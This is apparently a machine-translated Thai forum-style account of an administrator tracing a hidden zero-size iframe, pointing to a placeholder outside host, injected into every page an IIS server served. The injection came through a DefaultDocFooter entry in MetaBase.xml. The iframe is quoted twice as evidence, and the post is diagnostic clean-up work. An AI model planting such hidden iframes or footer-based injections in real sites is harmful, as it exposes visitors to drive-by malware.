เมื่อเซิร์ฟเวอร์เปิดเว็บไซต์เกือบทั้งหมด แม้แต่หน้า HTML ก็จะปรากฏขึ้น
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
โค้ดลักษณะนี้บางส่วนอยู่ที่ส่วนหัวและบางส่วนอยู่ส่วนท้ายของซอฟต์แวร์จะรายงานไวรัสเมื่อเปิด
ฉันไม่พบรหัสนี้ในซอร์สโค้ดเมื่อฉันเปิดหน้า HTML หรือ ASP PHP
วิเคราะห์เหตุผล
ก่อนอื่น ฉันสงสัยว่ามัลแวร์ ARP ฉันใช้เครื่องมือต่อต้าน ARP และไม่พบการปลอมแปลง arp
นอกจากนี้ โดยทั่วไปการปลอมแปลง arp จะไม่ถูกแทรกลงในโค้ดทุกครั้ง แต่บางครั้งและบางครั้ง
และคุณยังสามารถค้นหารหัสนี้เมื่อเข้าถึงโดยใช้ http://127.0.0.1 หรือ http://localhost
ความเป็นไปได้ของการปลอมแปลง arp หมดสิ้นแล้ว
จากนั้นฉันคิดว่า JS อาจถูกแก้ไขหรือไฟล์อื่น ๆ ที่รวมอยู่ หลังจากค้นหาแล้ว ไม่พบหน้าที่แก้ไข แม้ว่าในขณะที่เรียกดูหน้า HTML ที่สร้างขึ้นใหม่ รหัสนี้จะถูกแทรก ดังนั้นจึงสามารถวางสายผ่าน IIS เท่านั้น .
หลังจากสำรองข้อมูล iis แล้วติดตั้ง iis ใหม่ โค้ดก็หายไป หลังจากกู้คืน iis ที่สำรองไว้ ปัญหาก็กลับมาอีกครั้ง
หลังจากค้นหาอย่างละเอียดแล้ว ปัญหาควรอยู่ในไฟล์การกำหนดค่า IIS เมื่อฉันเปิดไฟล์การกำหนดค่า ฉันไม่พบโค้ดชิ้นนั้น
มีโอกาสมากที่ไฟล์บางไฟล์จะถูกเรียก ฉันจะตรวจสอบสิ่งนี้ได้อย่างไร ฉันจำไฟล์ Filemon ที่มีชื่อเสียงได้
ฉันดาวน์โหลดหนึ่งรายการในเครื่องและอัปโหลดไปยังเซิร์ฟเวอร์ ฉันเปิด Filemon มีข้อมูลมากเกินไป ฉันกรองข้อมูลบางอย่างที่ไม่มีประโยชน์ออกไป
เหลือเพียงกระบวนการ iis และยังมีข้อมูลจำนวนมาก ดูเหมือนว่าผู้คนจำนวนมากกำลังเยี่ยมชมไซต์บนเซิร์ฟเวอร์
ปิดไซต์ทั้งหมดและสร้างไซต์ทดสอบ anky ไดเร็กทอรีคือ D:www และสร้างหน้าว่าง test.htm ด้านล่าง
ไปที่หน้านี้ มีการแทรกโค้ดแล้ว และดูที่ Filemon วิธีการอ่าน C:Inetpubwwwrootiisstart.htm เป็นเรื่องแปลก
เปิด C:Inetpubwwwrootiisstart.htm แล้วดูว่ามี
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
ลบโค้ดและปล่อยว่างไว้ เมื่อเข้าถึง test.htm เป็นเรื่องปกติ ให้ลบ C:Inetpubwwwrootiisstart.htm แล้วเข้าถึงอีกครั้ง
นี่คือจุดที่ปัญหา "ข้อผิดพลาดในการอ่านไฟล์ข้อมูลส่วนท้าย" ปรากฏขึ้นใน test.htm ดูเหมือนว่าจะถูกเรียก
ไฟล์นี้
จะเป็นเรื่องปกติหากคุณล้าง C:Inetpubwwwrootiisstart.htm จะต้องทำอย่างไร เพื่อแก้ไขปัญหา แน่นอนว่าคุณต้องถอดปลั๊กออก
ดำเนินการต่อ
เป็นไปได้ไหมว่ามันเกิดจากการขยายเวลา? ฉันตรวจสอบมันในส่วนขยายแล้วและทุกอย่างเป็นปกติ
แน่นอนว่ายังมีโทรจันโทรจันผ่าน ISAPI อีกด้วย
หลังจากการไตร่ตรองอย่างถี่ถ้วน ในที่สุดฉันก็รู้สึกว่ามีบางอย่างผิดปกติกับไฟล์การกำหนดค่า
เปิดไฟล์การกำหนดค่าซึ่งอยู่ใน %windir%system32inetsrvMetaBase.xml
เปิดด้วย Notepad ค้นหา iisstart.htm แล้วหาบรรทัด ฉันคิดว่ามันเป็นไซต์เริ่มต้น แต่แล้วฉันก็คิดว่ามันผิด
ไซต์เริ่มต้นถูกลบแล้ว ลองดูโค้ดนี้ให้ละเอียดยิ่งขึ้น:
DefaultDocFooter = "ไฟล์: C:Inetpubwwwrootiisstart.htm"
ลบบรรทัดนี้และปัญหาจะได้รับการแก้ไขอย่างสมบูรณ์